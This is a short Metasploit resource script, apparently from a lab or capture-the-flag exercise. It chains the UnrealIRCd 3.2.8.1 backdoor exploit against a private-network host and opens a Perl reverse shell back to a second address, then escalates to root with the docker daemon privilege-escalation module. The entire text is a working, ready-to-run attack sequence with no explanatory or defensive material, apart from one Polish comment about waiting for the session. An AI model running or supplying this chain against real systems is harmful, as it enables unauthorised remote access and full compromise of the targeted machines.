use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOSTS 192.168.100.86
set RPORT 6697
set payload cmd/unix/reverse_perl
set LHOST 192.168.100.87
exploit -z

sleep 10 # Czekamy aż sesja się otworzy

sessions -l
sessions -i 1

use linux/local/docker_daemon_privilege_escalation
set SESSION 1
set LHOST 192.168.100.87
exploit